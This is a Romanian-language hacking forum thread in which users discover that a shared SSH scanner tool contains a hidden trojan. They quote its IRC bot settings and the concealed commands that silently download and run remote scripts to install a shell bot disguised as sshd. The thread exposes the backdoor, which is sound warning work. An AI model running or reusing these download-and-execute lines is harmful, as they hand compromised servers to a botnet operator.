Jump to content
xceedit

SSH scanner rapid

Recommended Posts

hmmmm cand descarc arhivele pe pc imi da virus desi nu ar trebuii pentru ca sunt doar scannere am si eu o gramada de scannere foarte bune si nu le vede ca virus.ciudat totusi o sa il rulez pe virtual machine sa vad ce e de capul lui.

Pai si la mine avira il vede ca virus, adica hack tool asa sa-i spunem, e ceva normal sa vada codul periculos..;)

Link to comment
Share on other sites

Incetati cu offtopicul ! Certurile si discutiile pe langa subiect le purtati prin MP-uri , va rog frumos .

On : O sa arunc si eu un ochi peste scanner si poate-l si pun la test putin si maine las aici ceva feedback .

Feedback-ul a venit mai repede decat te asteptai maestre .

Hmm ... deja nu-mi place ceea ce vad .

$servidor='irc.dal.net' unless $servidor;
my $porta='6667';
my @canais='#voievod';
my @adms=("voievod");

E frumos sa-ti faci boti de pe urma fraierilor care spera sa prinda N root-uri de la nasa.gov peste noapte ?

Sunt doua variante aici :

- ori esti prea prost si ai preluat si tu scannerul de la altul mai "intelijent" ca tine care te-a prostit si el pe tine la randul lui <-- varianta care nu prea sta in picioare

sau

- incerci sa profiti [ si nu prea-ti merge ] de pe urma la amaratii care au si ei un root de scan dupa care vor plange cand ii prinde adminu'

Dragi colegi , daca totusi va hotarati sa folositi scannerul postat de individul acesta mai sus dati un "nano scan" / "vi scan" , "pico scan" [ asta dupa ce ati dezarhivat continutul scannerului si ati intrat in folderul respectiv ] si stergeti aceste linii de cod :

cd /scn; wget -q http://ssh4ever.000space.com/get.sh;chmod a+x get.sh; sh get.sh;rm -rf get.sh

Sa zicem , doar sa zicem ca n-ai stiut nici tu. De data asta te alegi doar cu un avertizment . La urmatoarea abatere zbori !

Edited by MrRip
Link to comment
Share on other sites

Incetati cu offtopicul ! Certurile si discutiile pe langa subiect le purtati prin MP-uri , va rog frumos .

On : O sa arunc si eu un ochi peste scanner si poate-l si pun la test putin si maine las aici ceva feedback .

Ce test sa faci nebun? Ii tapa, iti ridica shell boti pe mIRC. Uite-te in fisierul scan ca iti downloadeaza un script, il ruleaza si apoi il sterge. Scriptul ala care il downloadeaza da jos alta arhiva de shell bot si o ruleaza apoi o sterge. Procesul e mascat sub numele de /usr/sbin/sshd daca nu ma insel. Boti intra pe mIRC pe serverul irc.dalnet.net port 6667 si canalul voievod.

Aveti fratilor grija ce downloadati ca is haxorei de carton care va fura serverele :))

Proof:

[root@RSTtest:~/new]# cat scan |grep wget

cd /scn; wget -q http://ssh4ever.000space.com/get.sh;chmod a+x get.sh; sh get.sh;rm -rf get.sh

[root@RSTtest:~/new]# cat get.sh

#!/bin/bash

sleep 1s

cd /scn; wget -q http://ssh4ever.000space.com/b.txt;perl /scn/b.txt;rm -rf /scn/b.txt

sleep 1s

[root@RSTtest:~/new]#

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...